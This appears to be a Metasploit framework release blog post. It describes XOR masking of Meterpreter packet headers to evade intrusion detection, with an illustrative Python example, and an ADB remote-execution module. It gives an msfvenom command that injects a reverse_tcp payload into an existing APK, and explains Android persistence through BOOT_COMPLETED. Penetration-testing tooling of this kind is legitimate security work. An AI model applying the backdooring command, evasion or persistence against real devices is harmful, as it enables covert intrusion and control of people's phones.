A little entropy goes a long way
Meterpreter can communicate via straight TCP or over HTTP(S), but whatever the transport, the protocol is pretty much the same. It uses what is called a TLV protocol, for Type-Length-Value. In truth, Meterpreter actually does it in a different order: Length, Type, Value. Each Meterpreter packet is a collection of TLVs and is itself a TLV. That makes it so you can skip over a type or even a whole packet without having to know how to parse it, but that doesn't really matter. What's important for us when talking about what this looks like on the wire is that each packet's method is a recognizable string in the header. That in turn makes it easier for IDS/IPS to get angry with our packets. And we don't like making them angry. As of this week, that recognizable string is no longer recognizable. Instead, it's xor'd with a random value so no two packet headers are alike (probabilistically).
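The length-first TLV layout and header masking described above, as an added example that is not Meterpreter's own code. The field widths (4-byte big-endian length and type), the 4-byte XOR key, the type numbers and the method string are assumptions constructed for illustration; the example shows why a record can be skipped from its length alone and why a literal-string content match stops firing once the bytes are xor'd.

```python
import os
import struct

HDR = struct.Struct(">II")  # assumed layout: 4-byte length, 4-byte type, big-endian

def tlv(type_id, value):
    # Length comes first and covers the 8-byte header plus the value.
    return HDR.pack(HDR.size + len(value), type_id) + value

def walk(buf):
    """Yield (type, value) for each record, using only the length to advance."""
    off = 0
    while off < len(buf):
        if len(buf) - off < HDR.size:
            raise ValueError("truncated header at offset %d" % off)
        length, type_id = HDR.unpack_from(buf, off)
        if length < HDR.size or off + length > len(buf):
            raise ValueError("bad length %d at offset %d" % (length, off))
        yield type_id, buf[off + HDR.size:off + length]
        off += length

def xor_mask(data, key):
    # Repeating-key XOR; applying it twice with the same key restores the input.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Constructed sample: the type numbers and the method string are made up.
T_PACKET, T_METHOD, T_UNKNOWN = 1, 2, 99
METHOD = b"example_method\x00"
PACKET = tlv(T_PACKET, tlv(T_UNKNOWN, b"\x01\x02\x03") + tlv(T_METHOD, METHOD))

def signature_hits(wire):
    # What a static content-match rule does: look for the literal string.
    return METHOD in wire

def method_of(packet):
    # The packet is itself one record whose value is a list of records.
    (_, body), = walk(packet)
    return next(v for t, v in walk(body) if t == T_METHOD)

if __name__ == "__main__":
    key = os.urandom(4)  # a fresh key per packet changes the bytes every time
    masked = xor_mask(PACKET, key)
    print("literal match, plain: ", signature_hits(PACKET))
    print("literal match, masked:", signature_hits(masked))
    print("method after unmasking:", method_of(xor_mask(masked, key)))
```

The unknown type 99 is stepped over without being understood, which is the skip-ahead property the paragraph mentions.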
More Android fun
Debugging like a boss
ADB is a debugging tool for Android that you can enable by turning on the phone's developer mode. It can run as a TCP server, much like GDB server does, and convincing a debugger to run code for you is pretty straightforward, since that's kinda what it's for. Typically, remote debuggers aren't exposed to real networks, but you never know. Where this is more likely to show up is on a developer's machine, where the adb service is used to communicate with a local emulator or a device connected via USB. Now with exploit/android/adb/adb_server_exec, you can upload a native payload to those devices for fun and profit.
Backdoor all the things
For a longer term solution, you might want to take advantage of the new ability in msfvenom to use an existing APK as a template. First, you'll need a couple of external tools -- jarsigner from any ol' Java SDK and apktool. Once those are squared away, you can take something like Facebook's APK and inject a Meterpreter payload on top of it:
msfvenom -x foo.apk -p android/meterpreter/reverse_tcp LHOST=220.127.116.11 -o bar.apk
Bad intentions, or Badass intentions?
Intents are neat. They're basically a way to tell an Android device, "run whatever app is registered to handle this thing." One of the most common is android.intent.action.VIEW, which handles images and web pages and such. There's now a new command called activity_start that lets you manually invoke arbitrary intents. So once you've got that Meterpreter session, you can do this
and have everyone's favorite song play on YouTube. There's another one called BOOT_COMPLETED that lets you register a thing to run when the phone is finished booting; basically built-in persistence. We've had this one enabled for a while now, but we haven't mentioned it here yet: as long as you install the APK and run it once, the device will kindly restart it every time it comes back on.
Exploit modules (2 new)
- Android ADB Debug Server Remote Payload Execution by joev
- D-Link DCS-930L Authenticated Remote Command Execution by Nicholas Starke
Auxiliary and post modules (4 new)
- Server Opcode 0x534 Denial of Service by Gianni Gnesa, and William Webb exploits OSVDB-132307
- Jenkins-CI Unauthenticated Script-Console Scanner by Jeffrey Cap, and altonjx
- Wordpress XML-RPC system.multicall Credential Collector by sinn3r, KingSabri, and William
- Telisca IPS Lock Cisco IP Phone Control by Fakhir Karim Reda, and zirsalem
As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.7...4.11.10